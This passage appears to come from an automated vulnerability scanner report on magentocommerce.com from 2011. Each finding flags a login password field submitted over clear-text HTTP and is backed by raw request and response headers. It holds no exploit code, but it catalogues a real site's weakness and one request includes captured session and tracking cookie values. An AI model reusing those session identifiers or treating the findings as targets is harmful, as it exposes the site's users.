Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Fscreencasts%2Fupsells%2Fview%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A4%3Bs%3A28%3A%22%2Fproduct%2Fdeployed-solutions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:25 GMT
Content-Length: 33171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.96. http://www.magentocommerce.com/media/screencasts/working-with-paypal/view  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screencasts/working-with-paypal/view

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screencasts/working-with-paypal/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:07:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176036; expires=Sat, 11-Aug-2012 15:07:16 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A44%3A%22%2Fmedia%2Fscreencasts%2Fworking-with-paypal%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:07:16 GMT
Content-Length: 40839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.97. http://www.magentocommerce.com/media/screenshots  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/screenshots

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/screenshots HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175862; expires=Sat, 11-Aug-2012 15:04:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreenshots%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 36191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.98. http://www.magentocommerce.com/media/videos  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/videos HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.99. http://www.magentocommerce.com/media/videos/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/videos/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/videos/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176188; expires=Sat, 11-Aug-2012 15:09:48 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fmedia%2Fvideos%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:48 GMT
Content-Length: 37445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.100. http://www.magentocommerce.com/media/webinars  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/webinars HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175869; expires=Sat, 11-Aug-2012 15:04:29 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:30 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.101. http://www.magentocommerce.com/media/webinars/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/webinars/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /media/webinars/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175893; expires=Sat, 11-Aug-2012 15:04:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fmedia%2Fwebinars%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:54 GMT
Content-Length: 178679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.102. http://www.magentocommerce.com/partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170940; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A2%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A3%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.9.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171052; expires=Sat, 11-Aug-2012 13:44:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A2%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A3%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:12 GMT
Content-Length: 38025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.103. http://www.magentocommerce.com/partners/find/bronze-solution/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/bronze-solution/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/bronze-solution/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176342; expires=Sat, 11-Aug-2012 15:12:22 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fpartners%2Ffind%2Fbronze-solution%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 65854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.104. http://www.magentocommerce.com/partners/find/hosting-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/hosting-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/hosting-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176345; expires=Sat, 11-Aug-2012 15:12:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fpartners%2Ffind%2Fhosting-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:25 GMT
Content-Length: 51575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.105. http://www.magentocommerce.com/partners/find/industry-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/industry-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/industry-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Findustry-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:15 GMT
Content-Length: 54897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.106. http://www.magentocommerce.com/partners/find/solution-partners/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/find/solution-partners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/find/solution-partners/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176347; expires=Sat, 11-Aug-2012 15:12:27 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fpartners%2Ffind%2Fsolution-partners%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:27 GMT
Content-Length: 63005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.107. http://www.magentocommerce.com/partners/hosting-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/hosting-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/hosting-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176331; expires=Sat, 11-Aug-2012 15:12:11 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fpartners%2Fhosting%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:11 GMT
Content-Length: 37154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.108. http://www.magentocommerce.com/partners/industry-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/industry-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/industry-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176341; expires=Sat, 11-Aug-2012 15:12:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fpartners%2Findustry%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:22 GMT
Content-Length: 38023

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.109. http://www.magentocommerce.com/partners/solution-partners  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /partners/solution-partners

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /partners/solution-partners HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176334; expires=Sat, 11-Aug-2012 15:12:14 GMT; path=/; domain=magentocommerce.com
